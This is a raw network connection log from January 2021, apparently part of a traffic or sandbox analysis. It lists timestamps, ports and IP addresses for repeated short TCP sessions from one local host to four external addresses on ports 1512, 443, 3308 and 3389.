Jan 12, 2021 07:40:34.100542068 CET	49241	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:34.100785017 CET	49241	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:34.153553009 CET	1512	49241	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:34.153759956 CET	49241	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:34.192940950 CET	1512	49241	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:34.206660986 CET	1512	49241	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:34.309755087 CET	1512	49241	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:34.309788942 CET	1512	49241	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:34.309968948 CET	49241	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:34.313148022 CET	49241	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:34.365995884 CET	1512	49241	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:34.416512012 CET	49242	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:34.468136072 CET	443	49242	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:34.468278885 CET	49242	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:34.469327927 CET	49242	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:34.520786047 CET	443	49242	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:34.535433054 CET	443	49242	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:34.535625935 CET	49242	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:34.548202038 CET	49242	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:34.602159977 CET	443	49242	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:34.602368116 CET	49242	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:34.608846903 CET	49242	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:34.609159946 CET	49242	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:34.660567045 CET	443	49242	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:34.660767078 CET	49242	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:34.698815107 CET	443	49242	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:34.712352991 CET	443	49242	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:34.830470085 CET	443	49242	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:34.830498934 CET	443	49242	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:34.830662966 CET	49242	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:34.834930897 CET	49242	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:34.886493921 CET	443	49242	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:34.951050043 CET	49243	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:34.994267941 CET	3308	49243	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:34.994438887 CET	49243	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:34.995801926 CET	49243	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:35.039017916 CET	3308	49243	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:35.049540997 CET	3308	49243	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:35.049587965 CET	3308	49243	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:35.049683094 CET	49243	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:35.049711943 CET	49243	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:35.068247080 CET	49243	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:35.113329887 CET	3308	49243	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:35.113564014 CET	49243	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:35.123959064 CET	49243	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:35.124387980 CET	49243	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:35.167620897 CET	3308	49243	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:35.167817116 CET	49243	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:35.207437992 CET	3308	49243	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:35.210952997 CET	3308	49243	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:35.210988998 CET	3308	49243	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:35.324661970 CET	3308	49243	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:35.324695110 CET	3308	49243	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:35.324948072 CET	49243	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:35.330430031 CET	49243	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:35.373542070 CET	3308	49243	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:35.449285030 CET	49244	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:35.503045082 CET	3389	49244	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:35.503154993 CET	49244	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:35.504913092 CET	49244	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:35.558567047 CET	3389	49244	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:35.587795973 CET	3389	49244	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:35.587843895 CET	3389	49244	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:35.587894917 CET	49244	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:35.587925911 CET	49244	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:35.600533009 CET	49244	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:35.661206007 CET	3389	49244	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:35.661492109 CET	49244	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:35.670881987 CET	49244	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:35.670994997 CET	49244	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:35.724276066 CET	3389	49244	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:35.724663973 CET	49244	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:35.763874054 CET	3389	49244	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:35.778395891 CET	3389	49244	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:35.778422117 CET	3389	49244	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:35.869467020 CET	3389	49244	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:35.869502068 CET	3389	49244	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:35.869750977 CET	49244	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:35.875390053 CET	49244	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:35.928870916 CET	3389	49244	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:35.995253086 CET	49245	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:36.048248053 CET	1512	49245	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:36.048404932 CET	49245	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:36.049254894 CET	49245	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:36.102227926 CET	1512	49245	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:36.109071970 CET	1512	49245	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:36.109097958 CET	1512	49245	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:36.109266996 CET	49245	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:36.124222994 CET	49245	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:36.178371906 CET	1512	49245	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:36.178500891 CET	49245	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:36.183762074 CET	49245	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:36.183907032 CET	49245	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:36.236809969 CET	1512	49245	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:36.236922026 CET	49245	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:36.273097992 CET	1512	49245	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:36.289952040 CET	1512	49245	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:36.389153004 CET	1512	49245	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:36.389180899 CET	1512	49245	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:36.389272928 CET	49245	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:36.389321089 CET	49245	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:36.396152020 CET	49245	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:36.450645924 CET	1512	49245	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:36.510747910 CET	49246	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:36.562962055 CET	443	49246	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:36.563079119 CET	49246	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:36.564801931 CET	49246	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:36.616978884 CET	443	49246	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:36.631721020 CET	443	49246	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:36.631861925 CET	49246	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:36.648212910 CET	49246	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:36.702800035 CET	443	49246	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:36.703092098 CET	49246	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:36.708679914 CET	49246	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:36.708781958 CET	49246	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:36.761049986 CET	443	49246	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:36.761324883 CET	49246	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:36.799069881 CET	443	49246	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:36.814027071 CET	443	49246	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:36.931624889 CET	443	49246	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:36.931664944 CET	443	49246	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:36.931956053 CET	49246	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:36.935825109 CET	49246	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:36.987958908 CET	443	49246	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:37.053073883 CET	49247	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:37.096390963 CET	3308	49247	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:37.096580982 CET	49247	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:37.097404003 CET	49247	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:37.140603065 CET	3308	49247	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:37.151091099 CET	3308	49247	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:37.151138067 CET	3308	49247	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:37.151245117 CET	49247	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:37.168833017 CET	49247	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:37.213810921 CET	3308	49247	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:37.213967085 CET	49247	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:37.224703074 CET	49247	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:37.225097895 CET	49247	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:37.268201113 CET	3308	49247	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:37.268387079 CET	49247	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:37.308171988 CET	3308	49247	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:37.311567068 CET	3308	49247	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:37.311609030 CET	3308	49247	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:37.424351931 CET	3308	49247	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:37.424406052 CET	3308	49247	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:37.424488068 CET	49247	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:37.424523115 CET	49247	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:37.426959991 CET	49247	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:37.470103979 CET	3308	49247	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:37.545845032 CET	49248	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:37.599725008 CET	3389	49248	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:37.599930048 CET	49248	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:37.601512909 CET	49248	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:37.655594110 CET	3389	49248	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:37.679405928 CET	3389	49248	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:37.679425955 CET	3389	49248	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:37.679481983 CET	49248	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:37.679522038 CET	49248	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:37.688433886 CET	49248	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:37.753989935 CET	3389	49248	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:37.754127979 CET	49248	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:37.759599924 CET	49248	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:37.759730101 CET	49248	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:37.813867092 CET	3389	49248	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:37.814101934 CET	49248	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:37.853142977 CET	3389	49248	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:37.868407965 CET	3389	49248	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:37.868458986 CET	3389	49248	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:37.957952976 CET	3389	49248	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:37.957983971 CET	3389	49248	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:37.958177090 CET	49248	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:37.961431980 CET	49248	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:38.015310049 CET	3389	49248	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:38.071171999 CET	49249	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:38.124207020 CET	1512	49249	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:38.124336958 CET	49249	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:38.125438929 CET	49249	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:38.178268909 CET	1512	49249	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:38.185338020 CET	1512	49249	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:38.185360909 CET	1512	49249	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:38.185462952 CET	49249	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:38.196923018 CET	49249	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:38.251178026 CET	1512	49249	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:38.251326084 CET	49249	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:38.255438089 CET	49249	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:38.255619049 CET	49249	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:38.308473110 CET	1512	49249	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:38.308748007 CET	49249	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:38.345110893 CET	1512	49249	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:38.362090111 CET	1512	49249	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:38.362114906 CET	1512	49249	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:38.462198019 CET	1512	49249	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:38.462223053 CET	1512	49249	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:38.462261915 CET	49249	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:38.462306023 CET	49249	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:38.464483976 CET	49249	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:38.517321110 CET	1512	49249	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:38.565727949 CET	49250	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:38.617332935 CET	443	49250	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:38.617438078 CET	49250	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:38.618544102 CET	49250	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:38.669955969 CET	443	49250	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:38.685161114 CET	443	49250	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:38.685301065 CET	49250	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:38.701272011 CET	49250	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:38.755237103 CET	443	49250	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:38.755372047 CET	49250	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:38.765168905 CET	49250	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:38.765444040 CET	49250	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:38.817079067 CET	443	49250	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:38.817367077 CET	49250	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:38.869008064 CET	443	49250	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:38.987543106 CET	443	49250	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:38.987587929 CET	443	49250	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:38.987732887 CET	49250	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:38.990873098 CET	49250	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:39.042341948 CET	443	49250	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:39.096889019 CET	49251	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:39.140116930 CET	3308	49251	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:39.140208960 CET	49251	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:39.141108036 CET	49251	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:39.184139013 CET	3308	49251	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:39.195872068 CET	3308	49251	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:39.195894003 CET	3308	49251	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:39.196028948 CET	49251	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:39.206520081 CET	49251	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:39.251394987 CET	3308	49251	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:39.251580000 CET	49251	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:39.258481979 CET	49251	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:39.258734941 CET	49251	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:39.301934004 CET	3308	49251	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:39.302037954 CET	49251	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:39.342497110 CET	3308	49251	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:39.345165014 CET	3308	49251	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:39.345180988 CET	3308	49251	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:39.457868099 CET	3308	49251	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:39.457895994 CET	3308	49251	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:39.458090067 CET	49251	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:39.460982084 CET	49251	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:39.503941059 CET	3308	49251	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:39.563970089 CET	49252	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:39.617949009 CET	3389	49252	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:39.618030071 CET	49252	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:39.618879080 CET	49252	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:39.672333002 CET	3389	49252	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:39.697057009 CET	3389	49252	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:39.697074890 CET	3389	49252	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:39.697175980 CET	49252	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:39.704081059 CET	49252	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:39.768456936 CET	3389	49252	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:39.768639088 CET	49252	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:39.772731066 CET	49252	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:39.772855043 CET	49252	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:39.826764107 CET	3389	49252	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:39.826913118 CET	49252	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:39.866292000 CET	3389	49252	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:39.881311893 CET	3389	49252	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:39.881335974 CET	3389	49252	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:39.976005077 CET	3389	49252	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:39.976037979 CET	3389	49252	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:39.976238966 CET	49252	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:39.976285934 CET	49252	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:39.979274988 CET	49252	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:40.033222914 CET	3389	49252	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:40.095516920 CET	49253	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:40.148710012 CET	1512	49253	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:40.148792028 CET	49253	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:40.149600983 CET	49253	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:40.202514887 CET	1512	49253	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:40.209330082 CET	1512	49253	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:40.209362984 CET	1512	49253	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:40.209474087 CET	49253	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:40.222527027 CET	49253	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:40.277008057 CET	1512	49253	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:40.277394056 CET	49253	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:40.287939072 CET	49253	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:40.288335085 CET	49253	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:40.341309071 CET	1512	49253	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:40.341557026 CET	49253	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:40.381026983 CET	1512	49253	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:40.394572973 CET	1512	49253	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:40.498210907 CET	1512	49253	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:40.498234034 CET	1512	49253	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:40.498291016 CET	49253	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:40.498317957 CET	49253	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:40.500997066 CET	49253	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:40.553930998 CET	1512	49253	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:40.610892057 CET	49254	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:40.663027048 CET	443	49254	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:40.663145065 CET	49254	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:40.664163113 CET	49254	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:40.715995073 CET	443	49254	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:40.730827093 CET	443	49254	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:40.730916023 CET	49254	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:40.741808891 CET	49254	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:40.796065092 CET	443	49254	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:40.796170950 CET	49254	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:40.803137064 CET	49254	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:40.803287029 CET	49254	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:40.855312109 CET	443	49254	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:40.855448008 CET	49254	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:40.894855022 CET	443	49254	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:40.907329082 CET	443	49254	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:40.907347918 CET	443	49254	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:41.027040005 CET	443	49254	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:41.027096033 CET	443	49254	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:41.027271032 CET	49254	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:41.030121088 CET	49254	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:41.082035065 CET	443	49254	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:41.144171000 CET	49255	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:41.187319040 CET	3308	49255	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:41.187530994 CET	49255	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:41.188692093 CET	49255	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:41.232062101 CET	3308	49255	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:41.245867014 CET	3308	49255	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:41.245904922 CET	3308	49255	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:41.245985985 CET	49255	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:41.263699055 CET	49255	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:41.308819056 CET	3308	49255	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:41.309066057 CET	49255	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:41.313374996 CET	49255	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:41.313503981 CET	49255	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:41.356518984 CET	3308	49255	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:41.356756926 CET	49255	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:41.396858931 CET	3308	49255	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:41.399943113 CET	3308	49255	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:41.399960995 CET	3308	49255	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:41.513134956 CET	3308	49255	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:41.513184071 CET	3308	49255	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:41.513370991 CET	49255	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:41.516554117 CET	49255	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:41.559653997 CET	3308	49255	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:41.623049974 CET	49256	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:41.677098989 CET	3389	49256	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:41.677229881 CET	49256	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:41.678078890 CET	49256	3389	192.168.2.22	5.100.228.233
